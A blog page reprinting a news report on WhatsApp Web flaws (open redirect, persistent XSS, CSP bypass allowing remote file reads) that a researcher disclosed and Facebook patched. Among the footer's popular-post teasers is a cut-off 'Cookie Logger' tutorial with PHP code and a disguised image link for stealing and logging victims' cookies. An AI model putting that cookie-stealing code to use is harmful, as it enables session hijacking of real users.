Skip to main content

WhatsApp Bug Could Have Let Attackers Access Files On Your PCs

By
whatsapp web file read hacking

A cybersecurity researcher today disclosed technical details of multiple high severity vulnerabilities he discovered in WhatsApp, which, if exploited, could have allowed remote attackers to compromise the security of billions of users in different ways.

When combined together, the reported issues could have even enabled hackers to remotely steal files from the Windows or Mac computer of a victim using the WhatsApp desktop app by merely sending a specially crafted message.

Discovered by PerimeterX researcher Gal Weizman and tracked as CVE-2019-18426, the flaws specifically resided in WhatsApp Web, a browser version of the world's most popular messaging application that also powers its Electron-based cross-platform apps for desktop operating systems.

 In a blog post published today, Weizman revealed that WhatsApp Web was vulnerable to a potentially dangerous open-redirect flaw that led to persistent cross-site scripting attacks, which could have been triggered by sending a specially crafted message to the targeted WhatsApp users.


In the case when an unsuspecting victim views the malicious message over the browser, the flaw could have allowed attackers to execute arbitrary code in the context of WhatsApp's web domain.

Whereas, when viewed through the vulnerable desktop application, the malicious code runs on the recipients' systems in the context of the vulnerable application.

 Moreover, the misconfigured content security policy on the WhatsApp web domain also allowed the researcher to load XSS payloads of any length using an iframe from a separate attacker-controlled website on the Internet.

"If the CSP rules were well configured, the power gained by this XSS would have been much smaller. Being able to bypass the CSP configuration allows an attacker to steal valuable information from the victim, load external payloads easily, and much more," the researcher said.


As shown in the screenshot above, Weizman demonstrated the remote file read attack over WhatsApp by accessing the content of the hosts file from a victim's computer.

Besides this, the open-redirect flaw could have had also been used to manipulate URL banners, a preview of the domain WhatsApp displays to the recipients when they receive a message containing links, and trick users into falling for phishing attacks.

Weizman responsibly reported these issues to the Facebook security team last year, who then patched the flaws, released an updated version of its desktop application, and also rewarded Weizman with $12,500 under the company's bug bounty program.
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more